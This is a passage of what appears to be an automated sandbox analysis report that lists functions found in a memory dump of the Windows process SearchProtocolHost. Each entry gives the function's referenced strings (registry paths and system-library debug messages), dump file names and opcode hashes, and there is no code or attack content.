                                                                                      Function 037D1190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 037D119B
                                                                                      • BuildLabEx, xrefs: 037D122F
                                                                                      • @, xrefs: 037D11C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                      • API String ID: 0-3051831665
                                                                                      • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                      • Instruction ID: 9b095940e975f763dfc1697f387fe553efda26478360eea678c66a215e638c63
                                                                                      • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                      • Instruction Fuzzy Hash: 51318176A00619BBDB11DB94CC44EAFBBBDEB84760F104425F904EB2A0D731DA059B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037A51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      • Opcode ID: d038e343b9b4c1fd623d248c12ea9947cf0c5b8e7f13286b75d90f34e93f3e8e
                                                                                      • Instruction ID: a7b9cf6cbc436d3e9141f57c0ade4f1d0b3909f1d2a72fc65421d3f27ed74fef
                                                                                      • Opcode Fuzzy Hash: d038e343b9b4c1fd623d248c12ea9947cf0c5b8e7f13286b75d90f34e93f3e8e
                                                                                      • Instruction Fuzzy Hash: A23267756087118BC724CF18C484B3EB7E6AFCA724F184A2EF9D59B290E734D944DB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0380E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: Legacy$UEFI
                                                                                      • API String ID: 2994545307-634100481
                                                                                      • Opcode ID: 399d454f1fe606e75761249f483f008bb98e15ddd9001be7a62d3c5d5382c51d
                                                                                      • Instruction ID: fa791b1f136f931f4e107736460548c2eae223b391a83a8c11f7e8656a5b3c22
                                                                                      • Opcode Fuzzy Hash: 399d454f1fe606e75761249f483f008bb98e15ddd9001be7a62d3c5d5382c51d
                                                                                      • Instruction Fuzzy Hash: 45613F71A00B089FDB55DFE8CD50BAEB7B9FB44704F1448ADE549EB291E630E940CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0386B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 0386B5C4
                                                                                      • RedirectedKey, xrefs: 0386B60E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                      • API String ID: 0-1388552009
                                                                                      • Opcode ID: dce8a8173c1de299d8640dbc4f7cbd4ef21fb004ab24e775a3f570bf54bfcc41
                                                                                      • Instruction ID: fc1c1d3dd065938faaca5cb883c458e6d901b61313ade51a00a19d81c4c609bf
                                                                                      • Opcode Fuzzy Hash: dce8a8173c1de299d8640dbc4f7cbd4ef21fb004ab24e775a3f570bf54bfcc41
                                                                                      • Instruction Fuzzy Hash: 4761E5B5C00259EFDB11DFD5C888ADEBBB9FB48718F1480AAE505E7244E7349A49CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037AF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$$
                                                                                      • API String ID: 0-233714265
                                                                                      • Opcode ID: 48df672a847262f21cf7ade5c480bdcabc2c58033439ffa4ce63e268761a6152
                                                                                      • Instruction ID: 6f3afa17e083a7f6c1dd92b900950bb9086571fae7f1712ee4e6ef0623b014d0
                                                                                      • Opcode Fuzzy Hash: 48df672a847262f21cf7ade5c480bdcabc2c58033439ffa4ce63e268761a6152
                                                                                      • Instruction Fuzzy Hash: 9061BD75A01B49CFDB20EFA8C988BADF7F1BF84704F14426DD515AB680CB74A941DB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0379A229
                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0379A21B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                      • API String ID: 0-2876891731
                                                                                      • Opcode ID: 25f456eb8e42edd13d48526d7978dc4fa5728093d57ed75a6956236f654a8769
                                                                                      • Instruction ID: c8218e7aba8901d8007041d0d038405139578997adbc8d70e311ea55dfddb9c3
                                                                                      • Opcode Fuzzy Hash: 25f456eb8e42edd13d48526d7978dc4fa5728093d57ed75a6956236f654a8769
                                                                                      • Instruction Fuzzy Hash: A541CC38A01644DFEB11CF99D854B6AB7B8FF85704F1846A6E900EF3A1E636D910DB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0382314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      • Opcode ID: 9dc9175124003f1b961c5b24c2873eafdbb2a36c9659688ace324b5478713826
                                                                                      • Instruction ID: 73359ccf7a677d0b8f3ae3470785e0fa9fae298c7278d3781bab3f4d6cbe8552
                                                                                      • Opcode Fuzzy Hash: 9dc9175124003f1b961c5b24c2873eafdbb2a36c9659688ace324b5478713826
                                                                                      • Instruction Fuzzy Hash: C231D2392087509BE311DFA8D868B1AFBE4EFC5714F0804A9F854CB390EB74D945CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C31BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local\$@
                                                                                      • API String ID: 0-380025441
                                                                                      • Opcode ID: ebb36b50a0eae0beb188efeb56bc803c8f1a2c9d588531555b581cf16f62a6a5
                                                                                      • Instruction ID: 980f3f3e89b1559f3cb1b8e3e4c79886a06373582fb910b754ec33db263b1e51
                                                                                      • Opcode Fuzzy Hash: ebb36b50a0eae0beb188efeb56bc803c8f1a2c9d588531555b581cf16f62a6a5
                                                                                      • Instruction Fuzzy Hash: C731B07A518341AFEB20DF28C884A5BFBE8EB89754F04492EF99587250D638DD04DB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 0380289A
                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0380289F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                      • API String ID: 0-2653619699
                                                                                      • Opcode ID: a13c4d1fe07c23437365b924eda18c642e49279ea0431215e22a8041d57a016f
                                                                                      • Instruction ID: b8e0f08bf126caee2b51315245972534f1eeb3504af4e07941c68d008557b101
                                                                                      • Opcode Fuzzy Hash: a13c4d1fe07c23437365b924eda18c642e49279ea0431215e22a8041d57a016f
                                                                                      • Instruction Fuzzy Hash: 7D112C76B10204BBF725CA88CC85F6BB6A8DB84710F28846DB904DB284D6B4DD0093A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: MUI
                                                                                      • API String ID: 0-1339004836
                                                                                      • Opcode ID: 4744fcc53370546debecd6082df8be067da817ba283613bf071800abb3a86c2c
                                                                                      • Instruction ID: 64fec0b94c4dbf9408c13eeaab8640e386399180ea76e261bbe38268bcec8343
                                                                                      • Opcode Fuzzy Hash: 4744fcc53370546debecd6082df8be067da817ba283613bf071800abb3a86c2c
                                                                                      • Instruction Fuzzy Hash: BC824A75E002099FEF25CFA9E884BADF7B5FF48710F1882AAD859AB250D7309941DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037CA580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalTags
                                                                                      • API String ID: 0-1106856819
                                                                                      • Opcode ID: 055af09bd04cfd402dfd5fa270237e060f5499f0f441a5aea1f98ede017caf9e
                                                                                      • Instruction ID: 36eed69cb581cf94d4937f0e537b4a34bd0260d1eb90613af3084ee8ab594847
                                                                                      • Opcode Fuzzy Hash: 055af09bd04cfd402dfd5fa270237e060f5499f0f441a5aea1f98ede017caf9e
                                                                                      • Instruction Fuzzy Hash: E0716D75E0021A9FDF68CFD8D9806ADBBB1FF48314F1881AEE805EB284E7318951CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0379965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: ee2fb0b08b5b09b76123aa143fb8c8207c01fadec9492ae1b75352d6c3704fe8
                                                                                      • Instruction ID: 5c2f310794bd400d2e85dedc9cccf30d64ade9788ed0c5c8996e96cb13f7ffa3
                                                                                      • Opcode Fuzzy Hash: ee2fb0b08b5b09b76123aa143fb8c8207c01fadec9492ae1b75352d6c3704fe8
                                                                                      • Instruction Fuzzy Hash: 71614B75D00219AFEF21DF98D844BEEFBB8BF85710F14465EEA10A7250DB749901DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037A02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #%u
                                                                                      • API String ID: 0-232158463
                                                                                      • Opcode ID: e0d74279153e2112105e41a48601800c3b378dff4c2e132424efba7e060fc3d5
                                                                                      • Instruction ID: 1935aebb62ea096fe3a80fb1558ac2a641e14b3ce353df77cc52df9ed3736b71
                                                                                      • Opcode Fuzzy Hash: e0d74279153e2112105e41a48601800c3b378dff4c2e132424efba7e060fc3d5
                                                                                      • Instruction Fuzzy Hash: 49715B75A006099FDB15DFA9C984BAEB7F8FF48704F184169E901EB291EB34E941CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037AE547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: EXT-
                                                                                      • API String ID: 0-1948896318
                                                                                      • Opcode ID: 40bd098a179695918d61d26b9cb9de8ba91302515266e526ab96250642da047e
                                                                                      • Instruction ID: 9863f407f0f815ca25ee69c1fd79daf4e90514c82421eb287d20498f0c8ec97b
                                                                                      • Opcode Fuzzy Hash: 40bd098a179695918d61d26b9cb9de8ba91302515266e526ab96250642da047e
                                                                                      • Instruction Fuzzy Hash: 2941AE765187019BD720DA69C858B6FB7E8AFC8B14F040F2DF584EB580E774D904C7A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C41BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                      • Instruction ID: 04556505b1ee82cc18acac20776b2994e21493516697a04b48a78e8b131407ce
                                                                                      • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                      • Instruction Fuzzy Hash: 8F519C75100750AFD321CF59C845A6BB7F8FF88710F008A2EFA959B6A0E7B4E904CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0380C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: BinaryHash
                                                                                      • API String ID: 2994545307-2202222882
                                                                                      • Opcode ID: 9e6bc1f878ad82e690f6cd08cad42c68247503daa08ef85e5ae410854764f267
                                                                                      • Instruction ID: 08b87e905ee672013f65a503db8b1e13390d3772f872bd9a526cbbc197a6421a
                                                                                      • Opcode Fuzzy Hash: 9e6bc1f878ad82e690f6cd08cad42c68247503daa08ef85e5ae410854764f267
                                                                                      • Instruction Fuzzy Hash: 544154B590062CABDB61DE94CC84FDEB77CAB44714F0046E5E609AF180DB709F898FA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037C360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Flst
                                                                                      • API String ID: 0-2374792617
                                                                                      • Opcode ID: 31d80ed8b1097470384eba8725728cb081a9e2b376b2a5583c24858a5b363dc9
                                                                                      • Instruction ID: 8ff511558b4ceaf09977c7cfaf76ffbb70c54b49e243cc18cf51bc3bfad8293d
                                                                                      • Opcode Fuzzy Hash: 31d80ed8b1097470384eba8725728cb081a9e2b376b2a5583c24858a5b363dc9
                                                                                      • Instruction Fuzzy Hash: D841B7B4614301DFE354CF58C488A26FBE4EB89714F1885AEE499DF281D7B1C846CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037896E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 35w35w
                                                                                      • API String ID: 0-3574678180
                                                                                      • Opcode ID: 835736914a86af7088b65a14e070a02a673f483a07f4cbbf8289de2d11517b12
                                                                                      • Instruction ID: e6be955801f7a2e22e55d1fde85a3a5dcd232a39c4370e427affca964b6e3d72
                                                                                      • Opcode Fuzzy Hash: 835736914a86af7088b65a14e070a02a673f483a07f4cbbf8289de2d11517b12
                                                                                      • Instruction Fuzzy Hash: D421B37A640B10AFC721EF68C444B2ABBB5EBC9B54F15086DA755AF741D770D900CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0380C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: BinaryName
                                                                                      • API String ID: 2994545307-215506332
                                                                                      • Opcode ID: ac3839a8249d783c6620a7c246cb14e0e881513c2866417d683f28112afb071b
                                                                                      • Instruction ID: 553f7b84ba256c2d82470ddfa5c9e864e93c3fd5b602a3a6c083fc29fa2bae28
                                                                                      • Opcode Fuzzy Hash: ac3839a8249d783c6620a7c246cb14e0e881513c2866417d683f28112afb071b
                                                                                      • Instruction Fuzzy Hash: 5731D4BA900619AFEB15DE9CCC45E6BB7B8EB80720F0546A9E901EF290D7309E00C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038185AA Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 038185DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                      • API String ID: 0-702105204
                                                                                      • Opcode ID: 67447ec8347fb165c2ce155f0305cee7d7a032feab8b1d73e1b30770b1bdb38d
                                                                                      • Instruction ID: 0b81231fad8b49b6e9de590e9fa9fe875f1bbf8c953a42fcc753450d6dc801c2
                                                                                      • Opcode Fuzzy Hash: 67447ec8347fb165c2ce155f0305cee7d7a032feab8b1d73e1b30770b1bdb38d
                                                                                      • Instruction Fuzzy Hash: 8C012B353107089FDA34FBE9D84DA6AB76EEF41664F0800E9E506CB552CF206860CB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037E717A Relevance: .7, Instructions: 705COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: daee31316ed7e73db27b1a984a4309b5998f50179100564a27a048ef0e0da3fb
                                                                                      • Instruction ID: 0cd54446574832f180e85881837a3a2fbdbb08455e6060906268d3a36b016ea9
                                                                                      • Opcode Fuzzy Hash: daee31316ed7e73db27b1a984a4309b5998f50179100564a27a048ef0e0da3fb
                                                                                      • Instruction Fuzzy Hash: F8429175A006968FDB18CF59C8906AEF7B6FF8D314B18859DE952EB340D734E842CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037A2760 Relevance: .6, Instructions: 605COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
